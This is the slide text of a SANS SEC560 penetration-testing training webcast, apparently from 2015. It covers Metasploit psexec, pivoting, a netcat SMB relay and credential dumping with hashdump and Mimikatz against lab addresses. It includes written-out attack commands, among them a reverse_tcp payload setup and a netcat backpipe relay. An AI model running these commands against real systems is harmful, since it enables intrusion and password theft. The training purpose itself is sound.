A Taste Of SEC560 Webcast - SANS Institute

1

SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved

1


2

A Taste of SANS SEC 560: Adventures in High-Value Pen Testing

Copyright 2015, All Rights Reserved Version 2Q15

SANS Security 560

Network Penetration Testing and Ethical Hacking

2


3

Ed Skoudis

ed.skoudis

•  For Ed Skoudis to introduce himself as: -  A penetration tester and incident handler -  An SANS Instructor -  A course author: SANS SEC504 & SEC560 -  The SANS Pen Test Curriculum Lead -  Director of NetWars & CyberCity projects

Ed Skoudis

04/06/2015

Ed Skoudis

04/06/2015


4

3


5

SEC 560 Course Outline

•  560.1: Comprehensive Planning, Scoping, and Recon

•  560.2: In-Depth Scanning •  560.3: Exploitation & Post Exploitation •  560.4: Password Attacks & Merciless

Pivoting •  560.5: Wireless and Web Apps •  560.6: Full-Day Pen Test Lab and Capture

the Flag Contest


6

About the SANS SEC 560 Course

•  Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking – Organized around the workflow of professional

testers – Numerous hands-on labs, culminating in a full-

day end-to-end penetration test in 560.6 – Tips for avoiding common pitfalls

•  And saving time to make the tester more efficient and to make the test safer

4


7

A Formal Penetration Testing Definition

•  Penetration testing involves modeling the techniques used by real-world computer attackers … – To find vulnerabilities … – And, under controlled circumstances, to exploit

those flaws ... –  In a professional, safe manner according to a

carefully designed scope and rules of engagement ...

– To determine business risk and potential impact ... all with the goal of helping the organization improve security practices


8

Why Exploitation?

•  False positive reduction / elimination –  But, even if exploit doesn’t work, you still may

want to report on detected vulnerability •  Proof of vulnerability and therefore more

realistic treatment of risk •  Use of one machine as a pivot point to get

deeper inside the network –  More of a sense of what a real bad guy can

accomplish

•  Exploitation leads to post-exploitation… –  …which really helps us understand the

business risks that the target organization faces due to discovered vulnerabilities

Firewall DMZ

System

Internal System

Firewall DMZ

System

Internal System

5


9

Risks of Exploitation •  Service crash •  System crash •  System stability impacted •  System integrity violated •  Data exposure with legal ramifications

–  As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information

•  Inadvertently accessing the wrong system –  Out of scope or even the wrong target organization

•  Because of these concerns, verify that exploitation is allowed by Rules of Engagement –  And… double check for a given system whether it is in scope

•  Also, understand the probabilistic nature of exploit success


10

The Metasploit Arsenal •  Metasploit divides up

the concept of exploits, payloads, auxiliary, and post modules –  An exploit takes

advantage of a flaw in a target program

–  The payload makes the target do something the attacker wants

–  Auxiliary modules perform all kinds of tasks, including scanning

–  A post module is used in post-exploitation to plunder targets or manipulate them Exploit 2 Payload 1 Launcher Send to target

Exploit 1

Exploit 2

.

.

.

Exploit N

Payload 1

Payload 2

.

.

.

Payload M

User Interface

Choose

Exploit Collection

Payload Collection

Aux 1

Aux 2

.

.

.

Aux N

Auxiliary Modules

Post 1

Post 2

.

.

.

Post N

Post Modules

6


11

Metasploit psexec Module •  Metasploit includes a fantastic psexec module

–  It's an exploit module, although it is not really exploiting a specific vulnerability

–  Establishes an SMB session with the target RHOST using a provided admin-level SMBUser and SMBPass, causing the target to run a specified Metasploit payload

•  Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself

–  Select it at msfconsole using: msf > use exploit/windows/smb/psexec

–  Also supports pass-the-hash, authenticating to target via an admin username and hash

–  This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched Windows internal network environment


12

Psexec & the Pen Tester’s Pledge

7


13

•  Metasploit includes a “route” command to pivot through an already-exploited host via a Meterpreter session –  Carries follow-on exploits and payloads across Meterpreter session –  Don’t confuse this with the Meterpreter “route” command, which

manages routing tables on a compromised system running Meterpreter

Meterpreter Functionality: Pivoting using Metasploit’s Route Command

msf > use [exploit1] msf > set RHOST [victim1] msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > exploit meterpreter > (CTRL-Z to background session… will display meterpreter sid)

msf > route add [victim2_subnet] [netmask] [sid] msf > use [exploit2] msf > set RHOST [victim2] msf > set PAYLOAD [payload2] msf > exploit

Victim1

Exploit1 Meterpreter

Pen Tester Victim2

Exploit2 Payload2


14

Sending SMB Through a Netcat Relay to Pivot through Linux

Attacker

Linux Relay Machine

Target Windows

SMB client

nc listener

nc client

SMB Service

C:\> net use \\Linux\c$ [password] /u:[user]

# mknod backpipe p # nc –l –p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe

Mount Share, Psexec,

Grab hashes, etc.

8


15

Dumping Authentication Information from Memory with Mimikatz

•  Mimikatz was created by Benjamin Delpy (also known as gentilkiwi)

•  Pulls authentication information from memory on a Windows machine –  Searches through LSASS memory

of various specific locations, looking for password hashes and ***clear text passwords***

•  Originally, a separate executable (mimikatz.exe) to load on a target machine and run

•  Now, it’s a Metasploit Meterpreter module


16

Course Roadmap •  Motivation and Defs •  Password Attack Tips •  Account Lockout •  Password Guessing with THC-Hydra

Ø  Lab: Hydra •  Password Representation Formats •  Obtaining Hashes

Ø  Lab: Fgdump & Netcat Pivot Hashdump

•  More Hash Dumping Options Ø  Lab: Msf psexec & Mimikatz

•  John the Ripper Ø  Lab: John the Ripper

•  Cain Ø  Lab: Cain

•  Rainbow Table Attacks Ø  Lab: Ophcrack

•  Pass-the-Hash Attacks Ø  Lab: Pass-the-Hash

• Planning and Recon • Scanning • Exploitation &

Post-Exploitation • Password Attacks • Wireless Attacks • Web App Attacks

9


17

Using MSF psexec, a Netcat relay, Meterpreter, & hashdump

10.10.10.20

Target 2 Windows

SMB Services

TCP 445

Your Linux

10.10.75.1 Compromised

Linux DMZ Target

10.10.10.10 Target 1 Windows

Metasploit

nc listener

nc client

psexec

Meterpreter hashdump

TCP 4545

TCP 445

TCP 80

SMB Services


18

Launching Metasploit and Choosing psexec Module

10


19

Configuring Metasploit (1)


20

Configuring Metasploit (2)

Your Linux

10.10.75.1 Linux Target

10.10.10.10

Windows

Metasploit

nc nc

psexec

Meterpreter

TCP 4545

TCP 445

TCP 80

SMB

11


21

Preparing the Relay & Exploiting

Look at the details of this session’s connection,

between 10.10.10.10 and your Linux box.

Meterpreter

Your Linux


10.10.10.10 Windows

Metasploit

nc nc psexec

TCP 4545

TCP 445

TCP 80

SMB


22

Dumping the Hashes

Note that “run hashdump” can also

dump Windows password hints that users create, if they

are present.

12


23

Using msf route to Pivot and Mimikatz •  Let’s use the msf route command to pivot across our

Meterpreter session on 10.10.10.10 to attack 10.10.10.20 –  Getting Meterpreter on 10.10.10.20, and then loading Mimikatz

Your Linux

10.10.10.10 DMZ Target

Windows

Metasploit

Existing Meterpreter Session TCP

80

10.10.10.20 DMZ Target

Windows

Msf route to pivot SMB thru 10.10.10.10

for psexec on 10.10.10.20

New Meterpreter Session

TCP 445 allowed from 10.10.10 net

TCP 443

Load Mimikatz and dump hashes & passwords

SMB Services

SMB Services

10.10.75.1 Compromised

Linux DMZ Target


24

Background Session & Prepare to Attack 10.10.10.20

Your Linux

10.10.10.10

Windows

Metasploit

Existing Meterpreter

Session TCP 80

10.10.10.20

Windows

Msf route to pivot SMB thru 10.10.10.10

for psexec on 10.10.10.20

New Meterpreter Session TCP

443 SMB

SMB

TCP 445


13


25

Exploit 10.10.10.20 through Pivot

Don’t worry about this “Exploit failed” warning. As long as you see “Session N

created”… it worked. As long as you see the “meterpreter >” prompt

here, it worked.


26

Get System Info

Our session is with 10.10.10.20!

Your Linux

10.10.10.10

Windows

Existing Meterpreter

Session TCP 80

10.10.10.20

Windows

New Meterpreter Session TCP

443 Load Mimikatz and dump hashes & passwords

SMB

SMB

Metasploit

14


27

Load Mimikatz and Dump Passwords

Clear text password below!


28

Exiting & Lab Conclusions

•  In this lab, we’ve seen how to use Metasploit’s psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes

•  And, we’ve seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz to dump clear-text passwords

15


29

Webcast Conclusions

•  Pen testing can help a target organization better understand its risk posture and manage risks

•  Penetration testers can take advantage of plentiful tools and techniques in our work: –  Metasploit and the Meterpreter –  Psexec for code execution via SMB –  Netcat relays and msfconsole route for pivots –  Hashdump and Mimikatz for credentials

•  Know your tools in-depth, and never lose your focus on providing as much business value as you can in your penetration test!

It’s not the weapon that’s important.

It’s the Ninja wielding it.


30

Documents

A Taste Of SEC560 Webcast - SANS Institute